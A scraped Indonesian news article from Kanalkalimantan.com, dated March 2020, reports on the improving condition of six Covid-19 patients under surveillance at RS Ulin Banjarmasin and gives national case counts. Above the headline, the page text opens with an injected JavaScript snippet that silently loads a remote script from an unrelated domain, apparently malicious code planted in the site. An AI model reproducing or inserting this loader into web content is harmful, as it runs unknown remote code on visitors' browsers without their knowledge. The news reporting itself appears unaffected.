(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

UPDATE. Kondisi 6 PDP Covid-19 di RS Ulin Banjarmasin Kian Membaik


KANALKALIMANTAN.COM, BANJARBARU – Juru bicara Gugus Tugas Pencegahan Pengendalian dan Penanganan Covid-19 (Corona Virus) di Kalsel, HM Muslim, menyatakan bahwa kondisi para pasien dalam pengawasan (PDP) di Rumah Sakit Ulin Banjarmasin kian membaik.

“Semakin ke sini, kondisi mereka stabil dan membaik,” katanya, Kamis (19/3/2020).

Tercatat, ada 6 pasien di RS Ulin Banjarmasin yang saat ini tengah dirawat dan dalam pengawasan tim medis. Mereka merupakan pasien 01-05 dan 07. Pasien 07 merupakan seorang ABK Kapal, yang baru-baru ini dinyatakan sebagai PDP covid-19.

Jumlah ini tidak bertambah, pasca meninggalnya satu pasien kode 06 beberapa hari lalu, dengan diagnosa gejalanya pneumonia dan ada diabetes melitus. Pasien 06, 58 tahun, meninggal dunia saat statusnya diagnosa PDP. Dari riwayatnya, pasien tersebut sempat ke Jogja dan kemudian ketika pulang dirujuk ke salah satu RSS Swasta dan kemudian tanggal 16 dirawat di RS Ulin.

Meski ada yang Paisen Dalam Pengawasan (PDP) akan Covid 19, Kalsel masih belum meningkatkan status karena hasilnya masih belUm keluar karena masih belum positif Corona Virus.

Sebelumnya, ratusan suspect Covid-19 yang dirawat di sejumlah rumah sakit rujukan, saat ini masih menunggu kepastian hasil laboratorium Kementerian Kesehatan RI. Termasuk di antaranya 6 suspect yang dirawat di RSUD Ulin Banjarmasin. Dimana sebelumnya, salah seorang Pasien dalam pengawasan (PDP) yang dirawat di sana meninggal dunia.

Banyaknya antrean ini, menyebabkan hasil tes tak segera dapat disampaikan kepada daerah. Yang mestinya 3-4 hari bisa diketahui hasilnya, tapi saat ini belum ada kepastian. Hal ini tentunya menambah masalah dalam penanganan kasus Covid-19 di daerah. Sebab percepatan data pasien berhubungan dengan penelusuran jejak (tracking) kemungkinan penularan.

Di Jakarta saja misalnya, totalnya ada 478 kasus positif atau menunggu hasil. Selain 125 orang dinyatakan positif corona, 353 lainnya tengah menunggu hasil. Data ini merupakan pembaruan sampai 18 Maret 2020.

Seluruh 125 pasien positif itu domisili atau tempat tinggalnya tersebar di 90 Kelurahan di DKI. Sementara ada 35 kasus positif yang domisilinya belum di ketahui Kelurahan mana.

Diketahui, Juru Bicara Penanganan Covid-19 Achmad Yurianto menyebut kasus positif virus corona di Indonesia kembali bertambah. Kekinian, ada sebanyak 227 orang yang dinyatakan positif mengidap virus corona. Sebelumnya, kasus positif virus corona di Indonesia berjumlah 172 orang. Artinya, angka tersebut bertambah menjadi 55 kasus. “Ada tambahan 55 kasus positif. Sehingga total keseluruhan sampai sekarang pada pukul 12.00 WIB adalah 227 kasus positif,” kata Yurianto dalam keterangan pers di Youtube BNPB, Rabu (18/3/2020).

Saat ini, sebanyak 6 pasien suspect virus Corona atau Covid-19 masih dalam pengawasan serius pihak RSUD Ulin Banjarmasin. Dirut RSUD Ulin, dr Hj Suciati menyampaikan, kondisi terbaru pasien rujukan suspect Corona pasca-meninggalnya pasien Ulin-6 bervariasi. “Kondisi pasien Ulin-1 oksigennya masih turun naik. Sementara Ulin-7 masih dalam penanganan,” terangnya.

Suciati mengatakan, RSUD Ulin telah menerima 7 pasien rujukan suspect Corona. Dimana masing-masing pasien diberi kode ‘Ulin’ dan nomer urutan sesuai waktu rujukan. Pasca-meninggalnya salah seorang pasien rujukan kode Ulin-6, RSUD Ulin saat ini mengawasi 6 orang pasien.

Selain Ulin-1 dan Ulin-7, kondisi pasien Ulin-2, 3, 4, dan 5 sudah membaik. “Suhu tubuhnya di bawah 38 derajat. Saturasi oksigennya di atas 90, kadar oksigen tubuhnya normal dan frekuensi nafasnya juga normal 26-28,” terangnya. (Kanalkalimantan.com/rico)


Aldi Riduan

Uploader Terpercaya Kanal Kalimantan

Recent Posts

Lima Jabatan di Polres Banjarbaru Rotasi, 12 Personel Terima Penghargaan Kapolda

KANALKALIMANTAN.COM, BANJARBARU - Lima jabatan yang diisi para perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

41 menit ago

Nurgita Tiyas Berharap Guru Dapat Lebih Cakap Digital

KANALKALIMANTAN.COM, BANJARMASIN - Ketua TP PKK Kabupaten Banjar Hj Nurgita Tiyas menghadiri Talkshow Literasi Digital… Read More

53 menit ago

Srikandi PLN UPT Palangkaraya Mengajar di SDN 5 Bukit Tunggal

KANALKALIMANTAN.COM, PALANGKARAYA – PT PLN (Persero) Unit Pelaksana Transmisi (UPT) Palangkaraya melalui gugus tugas Srikandi… Read More

4 jam ago

Pemkab HSU Gelar Peringatan Harkitnas

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan memimpin upacara peringatan… Read More

4 jam ago

‘Memakan’ Jalan, Lapak Pedagang Pasar Lama Diminta Mundur

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah pedagang yang berjualan di Pasar Lama Banjarmasin tepatnya di Jalan Pasar… Read More

4 jam ago

Komisi III Banjarbaru Minta Masterplan Mitigasi Banjir Disempurnakan

KANALKALIMANTAN.COM, BANJARBARU - Masterplan penanganan banjir di Ibu Kota Provinsi Kalimantan Selatan (Kalsel) Banjarbaru, masih… Read More

4 jam ago

This website uses cookies.